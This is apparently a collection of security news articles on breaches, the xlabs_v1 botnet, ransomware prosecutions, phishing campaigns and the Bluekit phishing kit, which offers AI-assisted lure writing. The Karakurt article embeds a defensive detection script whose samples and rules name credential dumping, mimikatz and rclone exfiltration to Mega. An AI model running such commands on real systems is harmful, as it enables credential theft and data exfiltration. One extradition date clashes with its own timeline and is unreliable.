
RansomHouse says it breached Trellix and exposes internal systems

RansomHouse claimed responsibility for the Trellix breach, adding the security firm to its Tor data leak site and sharing screenshots of internal systems.

The RansomHouse ransomware group has claimed responsibility for the recent cyberattack on cybersecurity firm Trellix. To support its claims, the gang published screenshots allegedly showing access to internal Trellix services.

In early May, the company revealed a breach that allowed unauthorized access to part of its source code repository. The cybersecurity firm said it quickly launched an investigation with forensic experts and notified law enforcement. While the exact data accessed remains unclear, Trellix stated there is no evidence that its source code has been altered or exploited.

“Trellix recently identified unauthorized access to a portion of our source code repository. Upon learning of this matter, we immediately began working with leading forensic experts to resolve it. We have also notified law enforcement.” reads the update published by the security firm. “Based on our investigation to date, we have found no evidence that our source code release or distribution process was affected, or that our source code has been exploited. As part of our commitment to our broader security community, we intend to share further details as appropriate once our investigation is complete.”

The company did not disclose who carried out the attack or how it was done. It is also unclear how long the attackers had access to the repository.

Unauthorized access to part of a source code repository can expose sensitive logic, APIs, or credentials. Attackers may study the code to find vulnerabilities, create exploits, or plan targeted attacks. It can also lead to intellectual property theft, reputational damage, and supply chain risks if tampered code is later distributed to customers or partners.

The cybersecurity firm confirmed that part of its source code repository was breached, but said there is currently no evidence that its code release process or products were compromised.

RansomHouse is a cyber extortion group that emerged in late 2021 and quickly gained attention for targeting large organizations worldwide. Unlike traditional ransomware gangs, it initially focused on stealing data and extorting victims rather than encrypting systems.

The group presents itself as a “professional mediator” exposing poor cybersecurity practices, although researchers classify it as a financially motivated criminal operation. RansomHouse has been linked to attacks on healthcare providers, retailers, government agencies, technology firms, and critical infrastructure operators, claiming breaches involving AMD, Shoprite, and European institutions. The gang typically exploits exposed services, weak credentials, phishing, and vulnerable remote access systems.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Zara Data Breach: 197,000 Customers Exposed in Third-Party Security Incident

Nearly 200,000 Zara customers were exposed in a third-party breach linked to ShinyHunters, revealing emails, purchase history, and support data.

Personal data belonging to nearly 197,000 Zara customers has been compromised following a cyberattack on a former technology provider used by Inditex, the Spanish fashion giant behind some of the world’s most recognized retail brands including Bershka, Pull&Bear, and Massimo Dutti.

The breach came to light last month when Inditex confirmed unauthorized access to databases hosted by a third-party vendor. The company was careful to limit the alarm: the compromised databases did not contain names, passwords, payment details, addresses, or phone numbers.

“Inditex has immediately applied its security protocols and has started notifying the relevant authorities of this unauthorized access, that stems from a security incident that affected a former technology provider and has impacted several companies operating internationally,” reads a statement by Inditex.

“Operations and systems haven’t been affected and customers can continue to access and use its services safely.”

What was exposed, however, tells a different story about the scale of the incident.

The data breach notification service Have I Been Pwned analyzed the stolen dataset and confirmed that 197,400 unique email addresses were among the compromised records, alongside order IDs, product SKUs, geographic locations, purchase history, and customer support tickets, enough to paint a detailed picture of individual shopping habits and interactions with the brand.

“In April 2026, the fashion brand Zara was among a number of organisations targeted by the ShinyHunters extortion group as part of their “pay or leak” campaign. The group claimed the breach was related to a compromise of the Anodot analytics platform and subsequently published a terabyte of data allegedly including 95M support ticket records.” reads the alert by HIBP. “The data contained 197k unique email addresses alongside product SKUs, order IDs and the market the support ticket originated in. Zara’s parent company Inditex advised that the incident didn’t affect passwords or payment information.”

The extortion group ShinyHunters claimed the attack and the theft of a 140GB archive from BigQuery instances by exploiting compromised Anodot authentication tokens, the same technique they have used against dozens of other companies.

“Your Bigquery instances data was compromised thanks to Anodot.com.” the cybercrime group wrote on its Tor data leak site. “The company failed to reach an agreement with us despite our incredible patience, all the chances”


ShinyHunters has previously claimed breaches at Google, Cisco, Vimeo, Rockstar Games, Instructure, and the European Commission.

The Anodot vector is significant. ShinyHunters has told journalists that stolen Anodot tokens gave them access to analytics infrastructure across multiple large organizations simultaneously, a single point of failure that cascaded into dozens of separate breaches. The gang has also run coordinated vishing campaigns targeting employees’ SSO accounts at Microsoft Entra, Okta, and Google to move laterally into connected SaaS environments.

Inditex has not yet named the compromised provider or attributed the attack to a specific threat actor, despite ShinyHunters having publicly claimed it and released data as proof.

Zara is the flagship fashion brand of Inditex, one of the world’s largest apparel groups. Inditex reported revenue of about €38.6 billion in fiscal 2025 and employs roughly 160,000 people worldwide. Zara operates in more than 90 countries through thousands of stores and online platforms, making it one of the most globally recognized fast-fashion retailers.

Rival retailer Mango disclosed its own data breach last October, after a marketing vendor was hacked and customer data used in promotional campaigns was exposed. In that case, no extortion group has come forward, and the attackers remain unidentified.


Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

16-30 April 2026 Cyber Attacks Timeline

In the second timeline of April 2026 I collected 108 events, corresponding to an average of 7.2 events per day, a number that confirms a growing trend, driven by the increasing number of supply chain attacks, compared to the previous timeline, where I collected 94 events (6.27 events/day).

From Android TVs to routers: the xlabs_v1 Mirai-based botnet built for DDoS attacks

A new Mirai‑based botnet, xlabs_v1, hijacks ADB‑exposed IoT devices for powerful DDoS attacks, with 21 flooding methods and DDoS‑for‑hire use.

A new Mirai‑derived botnet called xlabs_v1 is hijacking internet‑exposed devices running Android Debug Bridge (ADB) and using them for large‑scale DDoS attacks. Hunt.io discovered the bot on an unsecured server; it includes 21 flood techniques across TCP, UDP, and raw protocols, allowing it to bypass basic protections. It appears to be sold as a DDoS‑for‑hire service, especially for targeting game and Minecraft servers.

During routine monitoring, researchers spotted an exposed directory on a Netherlands‑hosted server (176.65[.]139.44) used for bulletproof hosting. The operator had left their entire toolkit publicly accessible over TCP/80 with no authentication, allowing investigators to index everything before the attacker realized it was exposed.

Open access to the server revealed a six‑file toolkit instead of a login page, exposing binaries and text files with no authentication. Two files were auto‑tagged as malicious: arm7 (Mirai) and payloads.txt (exploit content), suggesting the operator was using analyst‑grade tools on an unsecured host. The directory held about 200 KB of data, including the packed ARM bot, an unstripped x86‑64 debug build, ADB infection one‑liners, a SOCKS5 proxy, and a placeholder targets file. The debug build’s intact symbols made reconstructing the bot’s behavior straightforward.

“The xlabs_v1 codebase reads as a focused commercial product rather than an opportunistic Mirai derivative. Its twenty-one flood variants, ChaCha20 string protection, OpenNIC-aware DNS resolution, and Speedtest-driven bandwidth profiling are subsystems aimed at a single outcome: keeping a fleet of compromised IoT devices reachable, accountable, and profitable for the operator. Everything else in the binary serves that goal or protects it.” reads the report published by Hunt.io.

xlabs_v1 botnet is built entirely for commercial DDoS‑for‑hire operations, with no added features like credential theft that could increase detection risk. Its core function is to receive attack commands and launch one of 21 flood variants, many aimed at game servers, including RakNet floods for Minecraft and OpenVPN‑shaped UDP traffic to evade filters. Delivered through ADB exploits, the ARMv7 bot targets Android TVs, set‑top boxes, and IoT hardware, part of a global surface of more than 4 million devices with TCP/5555 exposed.

“Infection vector is Android Debug Bridge on TCP/5555, with multi-architecture builds covering ARM, MIPS, x86-64, ARC, and Android APK, meaning any internet-exposed device running ADB is a potential target: Android TV boxes, set-top boxes, smart TVs, residential routers, and any IoT-grade hardware shipping with ADB enabled by default.” continues the report.

Once installed, the bot hides infection tags, profiles each device’s bandwidth by opening 8,192 TCP sockets, and reports Mbps to its panel so the operator can assign price tiers. It also kills competing botnets by scanning /proc, terminating rival processes, and removing malware on port 24936.

For resilience, xlabs_v1 resolves its C2 via OpenNIC, falls back to a firewall‑punching SOCKS‑style listener on TCP/26721, and masks itself as /bin/bash to evade casual inspection. Sensitive strings, including the C2 domain xlabslover.lol, the operator handle Tadashi, and the agent tag xlabs_v1, are encrypted with ChaCha20 but easily recovered due to key reuse.

Its command‑and‑control uses a custom TCP protocol, supporting bandwidth probes, updates, self‑restart, and attack dispatch. Together, these techniques reveal a sophisticated, commercially motivated DDoS botnet engineered for persistence, evasion, and profit.

Analysis of the xlabs_v1 botnet’s infrastructure begins with its C2 domain, xlabslover[.]lol, which resolves to a single IP in the Netherlands hosted by Offshore LC. The domain uses Ultahost nameservers, a provider often linked to bulletproof hosting, and shows no prior malware detections, suggesting a recently deployed C2.

Pivoting from the domain to its IP (176.65.139[.]134) reveals SSH as the only open port, plus past honeypot activity involving HTTP and .env‑file scanning. SSL history shows unusual self‑signed certificates, including one with the CN “Godisgood”, previously used on another IP in Germany, indicating the same operator managing multiple servers.

Three hosts within the 176.65.139.0/24 netblock appear tied to the botnet: .44 (staging), .42 (distribution), and .9 (additional distribution). Hunt.io captured open directories on these systems containing Mirai‑tagged binaries, multi‑architecture payloads, and ADB exploitation scripts.

Historical scans confirmed Mirai C2 activity in late March and early April 2026, consistent with the botnet’s active deployment period and revealing a consolidated, bulletproof infrastructure supporting xlabs_v1.

The operator behind the botnet uses the handle Tadashi, embedded in each build, while the botnet brand xlabs_v1 appears in every C2 registration, hinting at future versions. A development tag, aterna, shows earlier branding before release. OSINT searches linking “Tadashi,” “xlabs,” and “xlabslover” may reveal the operator’s DDoS‑for‑hire storefront. A decrypted banner also exposes hostility toward a rival fork, xlab 2, suggesting a code split or underground feud. Nearby infrastructure in the same netblock has hosted cryptojacking tools, though overlap with the xlabs operation remains unconfirmed.

“In commercial-criminal terms, xlabs_v1 is mid-tier. It is more sophisticated than the typical script-kiddie Mirai fork (which would lack the ChaCha20 layer, the multi-architecture binary set, the bandwidth profiling, and the registered-attack diversity), but less sophisticated than the top tier of commercial DDoS-for-hire operations (which would use TLS on the C2 channel, would not ship a debug build to production paths, would rotate cryptographic material across builds, and would not ship a hard-coded competitor-rivalry banner).” concludes the report. “This operator is competing on price and attack variety, not technical sophistication. Consumer IoT devices, residential routers, and small game-server operators are the target. Treat it accordingly.”

Pierluigi Paganini


(SecurityAffairs – hacking, xlabs_v1 botnet)

After 17 years, Gavril Sandu extradited to U.S. for hacking scheme

Romanian citizen Gavril Sandu was extradited to the U.S. nearly 17 years after a hacking scheme. He was indicted in 2017 and arrested in 2026.

Romanian national Gavril Sandu, 53, has been extradited to the United States for his role in a hacking scheme that took place 17 years ago.

“On November 14, 2017, a federal grand jury in Charlotte returned a criminal indictment charging Gavril Sandu, 53, with one count of conspiracy to commit bank fraud and one count of bank fraud. Sandu was arrested in Romania on January 9, 2026. He was extradited to the United States on April 30, 2026.” reads the press release published by DoJ.

The move closes a long-running cybercrime investigation revealed by the Justice Department.

The man appeared in a U.S. court after being extradited from Romania to face charges of bank fraud and conspiracy for his role in an international vishing scheme. Indicted in 2017, Sandu was arrested in Romania on January 9, 2026, and transferred to U.S. custody on April 30, 2026.

According to prosecutors, between May 2009 and October 2010, Sandu and co-conspirators hacked into small businesses’ VoIP systems, using them to make spoofed phone calls that impersonated banks and tricked victims into revealing debit card and PIN numbers. The stolen credentials were used to access accounts and steal funds.

“Greed crosses borders, but so does our relentless pursuit of justice,” said U.S. Attorney Russ Ferguson, emphasizing that international cyberscammers will face prosecution no matter where they operate.

The case underscores how global cooperation and timely extraditions remain vital to combating cyber-enabled financial fraud.

Investigators allege that Sandu collected these stolen credentials, used them to forge magnetic stripe cards, and acted as a money mule, withdrawing cash from compromised ATMs and bank accounts. He then split the proceeds with his co‑conspirators.

Following his extradition from Romania, Sandu was placed in federal custody awaiting trial. If convicted, he faces up to 30 years in prison.

“Scams originating outside of our country are out of control. Wherever scammers operate – here or abroad – we will use every tool available to bring them to justice.” concludes U.S. Attorney Ferguson.


Pierluigi Paganini

(SecurityAffairs – hacking, Gavril Sandu)

U.S. court sentences Karakurt ransomware negotiator to 8.5 years

Deniss Zolotarjovs was sentenced to 8.5 years in the U.S. after pleading guilty to money laundering and fraud tied to ransomware.

Deniss Zolotarjovs, a Latvian national linked to the Karakurt ransomware gang, has been sentenced to 8.5 years in U.S. prison, marking a significant step in efforts to combat global ransomware operations.

“A Latvian national was sentenced today to 102 months in prison for his role in a major Russian ransomware organization that stole from and extorted over 54 companies.” reads the press release published by DoJ.

In August 2024, the man was charged with money laundering, wire fraud, and extortion. He was arrested in Georgia in December 2023 and extradited to the U.S. in 2014.

In 2025, he pleaded guilty to money laundering and wire fraud conspiracy. Rather than carrying out technical intrusions, Zolotarjovs acted as a negotiator and strategist.

He analyzed stolen data, set ransom demands, and communicated directly with victims, earning about 10% of ransom payments through cryptocurrency laundering. Prosecutors described him as a key intermediary within a broader cybercrime ecosystem tied to former members of the Conti ransomware group.

Between 2021 and 2023, the group targeted over 54 organizations, causing over $56 million in losses. Victims included businesses, government entities, and even a pediatric healthcare provider.

“According to court documents, Deniss Zolotarjovs (Денисс Золотарёвс), 35, of Moscow, Russia, was a member of a ransomware organization led by former leaders of the Conti ransomware group. Brands used to identify the organization in ransom notes to their victims during the time of his involvement include Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, among others.” continues the press release. “During the time of Zolotarjovs’s active participation in the organization, approximately June 2021 to August 2023, the organization stole data from over 54 companies, including many in the United States.”

In one case, Zolotarjovs suggested leaking children’s medical data to pressure payment, highlighting the coercive tactics used. Another attack disrupted a U.S. 911 emergency dispatch system, underscoring the real-world impact of these operations.

“In one attack on a pediatric healthcare company, Zolotarjovs deliberately leveraged children’s health information for extortion.” DoJ states. “When he failed in extracting a ransom from this victim, he urged coconspirators to be “DESTROYERS” and to leak or sell copies of these pediatric health records to sow fear among future victims.”

Authorities say the case reflects the increasingly organized and professional nature of ransomware groups, which operate like businesses with defined roles such as negotiators, operators, and data brokers. It also demonstrates growing international cooperation, particularly between U.S. agencies and Georgian authorities, in tracking and prosecuting cybercriminals.

Officials from the Federal Bureau of Investigation emphasized that this sentencing sends a strong message: even individuals operating within Russia-linked cybercrime networks can be identified, pursued, and brought to justice. The case highlights both the human cost of ransomware attacks and the expanding reach of global law enforcement in tackling cyber extortion.

“With this sentence, a cruel, ruthless, and dangerous international cybercriminal is now behind bars,” said Assistant Attorney General A. Tysen Duva of the Justice Department’s Criminal Division. “Deniss Zolotarjovs helped his ransomware gang profit from hacks of dozens of companies, and even on a government entity whose 911 system was forced offline. He also used stolen children’s health information to increase his leverage to extort victim payments. The Criminal Division will continue to investigate and prosecute international hackers and extortionists from around the world, no matter where they live or operate.”

Accenture researchers first detailed the activity of this sophisticated, financially motivated threat actor in December 2021. The group’s activity was first spotted in June 2021, but it became more active in Q3 2021.

Zolotarjovs is the first member of the Karakurt group to be sentenced in the United States.

Most of the known victims are based in North America, while the remaining are in Europe. 

The analysis of the attack chain associated with this threat actor revealed that it primarily leverages VPN credentials to gain initial access to the target’s network.

In the initial attacks, the group gained persistence by using the popular post-exploitation tool Cobalt Strike. Later, the group switched to using the VPN IP pool or AnyDesk software to establish persistence and avoid detection.

Once inside the target network, the group used various tools to escalate privileges, including Mimikatz, or PowerShell to steal the ntds.dit file that contains Active Directory data.

However, the threat group in most attacks escalated privileges using previously obtained credentials.

For data exfiltration the group used 7zip and WinZip for compression, as well as Rclone or FileZilla (SFTP) to upload data to Mega.io cloud storage.

The Karakurt cyber extortion group typically gave victims one week to pay a ransom, which ranges from $25,000 to $13 million in Bitcoin. This information comes from a joint alert issued by the FBI, CISA, the Department of the Treasury, and FinCEN.
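The attack chain summarized above (credential-based access, Mimikatz or PowerShell against ntds.dit, 7zip/WinZip staging, Rclone or FileZilla to Mega.io, AnyDesk for persistence) lends itself to per-host correlation in endpoint telemetry. The following is an added example written for this page, not code from the joint alert or from Accenture; the event format and the sample events are constructed, and the regexes are assumptions about how these tools show up on a command line.

```python
import re
from collections import defaultdict

# Constructed process-creation events (host, user, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "fs01", "user": "CORP\\svc_backup", "image": "C:\\Windows\\System32\\ntdsutil.exe",
     "cmdline": 'ntdsutil.exe "ac i ntds" "ifm" "create full C:\\temp\\dump" q q'},
    {"host": "fs01", "user": "CORP\\svc_backup", "image": "C:\\Program Files\\7-Zip\\7z.exe",
     "cmdline": "7z.exe a -p -mhe=on C:\\temp\\finance.7z D:\\Shares\\Finance"},
    {"host": "fs01", "user": "CORP\\svc_backup", "image": "C:\\Users\\Public\\rclone.exe",
     "cmdline": "rclone.exe copy C:\\temp\\finance.7z mega:backup --transfers 8"},
    # Benign: a user extracting an archive is not staging.
    {"host": "ws22", "user": "CORP\\jdoe", "image": "C:\\Program Files\\7-Zip\\7z.exe",
     "cmdline": "7z.exe x C:\\Users\\jdoe\\Downloads\\report.7z"},
    # A single-stage hit on its own: a remote-access tool being installed.
    {"host": "ws07", "user": "CORP\\helpdesk", "image": "C:\\Users\\Public\\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"},
]

# One rule per stage of the chain described in the text. Patterns are assumptions, not signatures
# from the alert; tune them to the tooling actually approved in your environment.
RULES = [
    ("credential_access", re.compile(r"ntds\.dit|ntdsutil.*ac i ntds|mimikatz|sekurlsa|lsadump", re.I)),
    ("staging", re.compile(r"\b(7z|7za|winzip|wzzip)(\.exe)?\b.*\s+a\s+", re.I)),  # archive *creation*
    ("exfiltration", re.compile(r"\b(rclone|filezilla)(\.exe)?\b.*(mega|sftp:)", re.I)),
    ("persistence", re.compile(r"anydesk.*(--install|--silent)", re.I)),
]


def match_stages(event: dict) -> list:
    """Return the chain stages whose pattern matches this event's command line."""
    return [stage for stage, rx in RULES if rx.search(event["cmdline"])]


def correlate(events, min_stages: int = 2) -> dict:
    """Group stage hits per host; report hosts where at least min_stages distinct stages appear.

    A lone 7z or AnyDesk launch is normal admin activity; several stages of the same chain
    on one host is what makes the pattern worth paging on.
    """
    per_host = defaultdict(set)
    for ev in events:
        for stage in match_stages(ev):
            per_host[ev["host"]].add(stage)
    return {host: sorted(stages) for host, stages in per_host.items() if len(stages) >= min_stages}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["host"], match_stages(ev))
    print("correlated:", correlate(SAMPLE_EVENTS))
```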


Pierluigi Paganini

(SecurityAffairs – hacking, Karakurt ransomware)

Vimeo confirms breach via third-party vendor impacts 119K users

Hackers stole data of 119,000 Vimeo users in April. The breach, linked to a third‑party vendor, exposed personal details.

Vimeo confirmed a data breach after the ShinyHunters gang stole personal information of 119,000 users in April 2026. According to Have I Been Pwned, the attackers accessed user data through a compromise at Anodot, a third‑party analytics vendor.

“In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their “pay or leak” campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata.” reported Have I Been Pwned. “The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include “Vimeo video content, valid user login credentials, or payment card information”.”

Vimeo confirmed that the security incident is linked to a breach at Anodot. An unauthorized actor accessed some Vimeo user and customer data, mainly technical information, video titles, metadata, and in some cases email addresses.

“Vimeo is aware of a security incident affecting Anodot, a third-party analytics vendor used by Vimeo and many other companies. The Google Threat Intelligence report associated with the unauthorized actor claiming responsibility for the Anodot incident can be found at this link.” reads the notice on the security incident published by the company.

“We have identified that, as a result of the Anodot breach, an unauthorized actor accessed certain Vimeo user and customer data. Our initial findings suggest that the databases accessed primarily contain technical data, video titles and metadata, and, in some cases, customer email addresses.”

The company said no video content, login credentials, or payment data were exposed, and services were not disrupted. In response, Vimeo disabled Anodot access, removed the integration, engaged external security experts, and notified law enforcement.

The investigation is still ongoing, and updates will be shared as more details emerge.

After Vimeo’s disclosure, the ShinyHunters cybercrime group leaked a 106GB archive of stolen documents on its Tor data leak site.

ShinyHunters is a well-known name in the cybercriminal ecosystem. The group is associated with a broader loosely connected network often referred to as “the Com,” made up largely of young, English-speaking individuals. Their operations typically focus on stealing data from large organizations and using leak sites to pressure victims into paying ransoms in cryptocurrency.

ShinyHunters has recently targeted major companies and organizations, leaking data when ransom demands fail. Victims include the European Commission, Odido, Figure, Canada Goose, Rockstar, and SoundCloud. The group primarily uses social engineering, especially voice phishing, to steal credentials and access SaaS platforms like Salesforce, Okta, and Microsoft 365.


Pierluigi Paganini

(SecurityAffairs – hacking, Vimeo)

Ransomware Gang Member Linked to Russian Cybercrime Group Sentenced to Prison

A Latvian national operating from Moscow has been sentenced to 102 months in federal prison for his role as a key negotiator within a prolific Russian ransomware network. Deniss Zolotarjovs, 35, participated in a cybercrime syndicate that orchestrated data theft and extortion campaigns against over 54 organizations worldwide between June 2021 and August 2023. The […]

The post Ransomware Gang Member Linked to Russian Cybercrime Group Sentenced to Prison appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Microsoft warns of global campaign stealing auth tokens from 35K users

Microsoft revealed a phishing campaign hitting 35,000 users in 26 countries, stealing login tokens via fake code-of-conduct emails and legit services.

Microsoft disclosed a major phishing campaign that targeted over 35,000 users across 26 countries in mid-April 2026.

Attackers used fake “code of conduct” emails sent through legitimate platforms to trick recipients into visiting bogus sites that stole authentication tokens.

“The campaign targeted tens of thousands of users, primarily in the United States, and directed them through several stages of CAPTCHA and intermediate staging pages designed to reinforce legitimacy while filtering out automated defenses.” reads the report published by Microsoft. “The lures in this campaign used polished, enterprise-style HTML templates with structured layouts and preemptive authenticity statements, making them appear more credible than typical phishing emails and increasing their plausibility as legitimate internal communications.”

Most victims (92%) were in the U.S., mainly in healthcare and finance.

Attackers used alarming, time-sensitive messages to pressure victims into action, leading them to a fake but legitimate-looking sign-in page. This adversary‑in‑the‑middle (AiTM) phishing flow let attackers intercept authentication tokens in real time, bypassing weak MFA. Microsoft urges training, anti-phishing tools, secure browsers, and SmartScreen protections to defend against such threats.

The phishing campaign impersonated internal compliance and regulatory departments, using subject lines like “Internal case log issued under conduct policy” to create urgency and legitimacy. Attackers distributed emails via a legitimate email delivery service, embedding links in PDF attachments that led to attacker-controlled domains such as acceptable-use-policy-calendly[.]de.

After completing fake Cloudflare CAPTCHAs, victims were asked to “Review & Sign” documents and then redirected to a deceptive Microsoft sign-in page. This final step launched an adversary‑in‑the‑middle (AiTM) attack chain that proxied authentication and captured tokens, giving immediate access to user accounts despite multifactor authentication.

“Following these steps, users were redirected to a third site hosting the final stage of the attack. Analysis of the underlying code indicates that the final destination varied depending on whether the user accessed the workflow from a mobile device or a desktop system.” continues the report.

The campaign’s structure mimicked legitimate workflow and compliance verification processes, making detection difficult. Microsoft described it as “one of the most sophisticated code-of-conduct‑themed credential theft operations observed to date,” confirming that the attackers’ methods reflected a high degree of operational planning and technical adaptability.

Microsoft recommends a layered approach to reduce risk. Organizations should review Exchange Online Protection and Defender for Office 365 settings, enable features like Zero-hour Auto Purge, Safe Links, and Safe Attachments, and use network protection and SmartScreen-enabled browsers.

User awareness training and phishing simulations are key, along with manual monitoring and removal of suspicious emails. Strong authentication is essential, including MFA or passwordless methods, plus conditional access for privileged accounts.

Finally, enabling automated attack disruption in Defender XDR can help detect and contain threats quickly, limiting their impact.


Pierluigi Paganini

(SecurityAffairs – hacking, phishing)

Educational tech firm Instructure data breach may have impacted 9,000 schools

Instructure, maker of the Canvas learning platform, is investigating a cyber incident that exposed users’ personal data.

Instructure is a U.S.-based educational technology company best known for developing Canvas, one of the world’s most widely used learning management systems (LMS). 

The U.S. firm confirmed a cybersecurity incident that exposed users’ personal information. The company is working with external cybersecurity experts and law enforcement to investigate the breach. Canvas is widely used by schools and universities to manage courses, assignments, and online learning, raising concerns about student and staff data security.

The company says the security incident appears to be contained while investigations continue. Instructure revoked privileged credentials and access tokens, deployed security patches, rotated some keys as a precaution, and increased monitoring across systems.

“Out of an abundance of caution, we rotated certain keys, even though there is no evidence they were misused – Implemented increased monitoring across all platforms.” reads the Incident Report. “While we continue actively investigating, thus far, indications are that the information involved consists of certain identifying information of users at affected institutions, such as names, email addresses, and student ID numbers, as well as messages among users. At this time, we have found no evidence that passwords, dates of birth, government identifiers, or financial information were involved.”

So far, the exposed data likely includes user identifiers such as names, email addresses, student ID numbers, and some user messages. The company states that there is currently no evidence that passwords, dates of birth, government IDs, or financial data were affected.

The educational technology firm continues to monitor the situation and will notify institutions if new findings emerge, while updating its status page and working to strengthen system security.

Instructure did not share details about the attack, however, the ShinyHunters extortion group claimed responsibility for the attack and added the company to its Tor data leak site.

“Nearly 9,000 schools worldwide affected. 275 million individuals data ranging from students, teachers, and other staff containing PII. Several billions of private messages among students and teachers and students and other students involved, containing personal conversations and other PII. Your Salesforce instance was also breached and a lot more other data is involved. Pay or Leak.” the group wrote on its leak site. “This is a final warning to reach out by 6 May 2026 before we leak along with several annoying (digital) problems that’ll come your way. Make the right decision, don’t be the next headline.” reads the data leak site.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Bluekit phishing kit enables automated phishing with 40+ templates and AI tools

Bluekit is a new phishing kit with AI features, automated domain setup, and tools like spoofing, voice cloning, and 40+ attack templates.

Bluekit is a newly discovered phishing kit still in development that includes advanced features such as an AI assistant and automated domain registration. According to Varonis, it offers over 40 website templates along with tools for spoofing, voice cloning, antibot protection, geolocation tricks, and two-factor authentication bypass support.

“Varonis Threat Labs recently discovered Bluekit, a new phishing kit pitching a broader model. It advertises 40+ website templates, automated domain purchase and registration, 2FA support, spoofing, geolocation emulation, Telegram and browser notifications, antibot cloaking, and add-ons like an AI assistant, voice cloning, and a mail sender.” reads the report published by Varonis.

Bluekit supports multiple phishing templates targeting major services such as iCloud, Apple ID, Gmail, Outlook, Yahoo, ProtonMail, GitHub, Twitter, Zoho, Zara, and Ledger. It combines email, cloud, crypto, and developer platforms in one kit.

The researchers accessed Bluekit to analyze its internal dashboard, which centralizes phishing operations in a single interface. Operators can create campaigns, register or link domains, manage captured credentials, and send stolen data via Telegram.

The kit also includes a site-builder where users select domains, templates, and target brands. It provides detailed control over phishing pages, including login detection, redirects, anti-analysis checks, spoofing, and device filtering.

Bluekit tracks sessions in real time, storing cookies and login data, and displays post-login activity. Overall, it acts as a full phishing platform rather than a simple credential-stealing tool.

Bluekit includes an AI Assistant panel with multiple model options such as Llama (default), GPT-4.1, Claude Sonnet 4, Gemini, and DeepSeek variants.

The researcher noted that in testing, only the default Llama model was usable, while the others appeared but required extra configuration, suggesting possible use of jailbroken or non-standard setups if activated in practice.

The researchers tested the assistant with a phishing scenario targeting a Microsoft 365 MFA reset for a company executive, including QR-based lures and credential-harvesting pages.

Instead of producing a ready-made phishing campaign, the AI generated only a structured draft. The output relied heavily on placeholders and generic text, requiring manual refinement.

“We expected something closer to a polished phishing copilot: a finished lure, cleaner email copy, and perhaps even a workable QR-driven flow with less manual effort. What we received was much more limited.” continues the report. “The assistant returned a structured campaign draft, and much of it relied on placeholders instead of content that looked ready to use as-is.”

Overall, the AI Assistant acts more as a tool for building campaign outlines rather than delivering fully functional phishing kits.

Bluekit has been monitored over time not just for isolated campaigns, but for how quickly it evolves. Researchers initially aimed to catch it in real-world phishing activity, but its rapid development made the release cycle itself part of the observation. New features and templates were added so frequently that tracking updates became as important as identifying active deployments.

“Compared with similar phishing kits that have already advanced further into automation and operator convenience, Bluekit still appears to be a kit in active development.” concludes the report. “The feature set keeps evolving as we track it, and if that pace continues with broader adoption, Bluekit is likely to surface in future campaigns.”

(SecurityAffairs – hacking, Bluekit phishing kit)

Two US cybersecurity experts sentenced in ransomware case, third awaits July ruling

Two US security experts were sentenced to 4 years for helping ransomware attacks. A third accomplice pleaded guilty and awaits sentencing.

Two US cybersecurity professionals, Ryan Goldberg and Kevin Martin, were sentenced to four years in prison for their role in supporting ransomware attacks. Both pleaded guilty to conspiracy involving extortion. A third individual, Angelo Martino, also admitted involvement in the scheme and is currently awaiting sentencing that is scheduled for July 9. The case highlights how even security experts can take part in cybercrime activities.

“Ryan Goldberg, 40, of Georgia, and Kevin Martin, 36, of Texas, were sentenced.” reads the press release published by DoJ. “According to court documents, they and another co-conspirator, Angelo Martino, 41, of Florida, successfully deployed the ransomware known as ALPHV BlackCat between April 2023 and December 2023 against multiple victims located throughout the United States.”

In January, the two U.S. cybersecurity professionals pleaded guilty to charges tied to their roles in BlackCat/Alphv ransomware attacks that occurred in 2023.

Court records show Ryan Goldberg, Kevin Martin, and Martino deployed ALPHV BlackCat ransomware against U.S. victims from April to December 2023, sharing 20% of ransoms with operators. Despite working in cybersecurity, they extorted about $1.2M in Bitcoin from one victim, split the proceeds, and laundered the funds.

“According to court documents, Ryan Goldberg, 40, of Georgia, Kevin Martin, 36, of Texas, and another co-conspirator successfully deployed the ransomware known as ALPHV BlackCat between April 2023 and December 2023 against multiple victims located throughout the United States.” reads the press release published by DoJ. “All three men worked in the cybersecurity industry — meaning that they had special skills and experience in securing computer systems against harm, including the type of harm they themselves were committing against the victims in this case.”

In November, U.S. prosecutors charged Ryan Clifford Goldberg, Kevin Tyler Martin, and another Florida-based accomplice (aka “Co-Conspirator 1”) for using BlackCat ransomware to hack and extort five U.S. companies in 2023.

Between May and November 2023, the defendants carried out ransomware attacks on five U.S. companies, demanding different ransom sums from each target: approximately $10 million from a medical device company (which ultimately paid about $1.27 million in cryptocurrency), an unspecified amount from a Maryland-based pharmaceutical firm, $5 million from a California doctor’s office, $1 million from a California engineering company, and $300,000 from a Virginia-based drone manufacturer.

While only the medical device firm paid, the others refused.

Ryan Clifford Goldberg is a former incident response manager at cybersecurity firm Sygnia. Kevin Tyler Martin was a ransomware threat negotiator for cybersecurity firm DigitalMint at the time of the alleged conspiracy.

DigitalMint denied any misconduct, dismissed the two employees, and fully cooperated with investigators.

In October 2025, the DOJ indicted Ryan Clifford Goldberg and Kevin Tyler Martin for hacking and extortion in attacks on at least five U.S. companies.

“According to an affidavit filed in September by an FBI agent, the three men began using malicious software in May 2023 “to conduct ransomware attacks against victims,” first hitting a medical company in Florida by locking its servers and demanding $10 million to unlock the systems, court records say.” reported the Chicago Sun Times. “The FBI agent noted the men ultimately made off with $1.2 million, although it was apparently the only successful attack.”

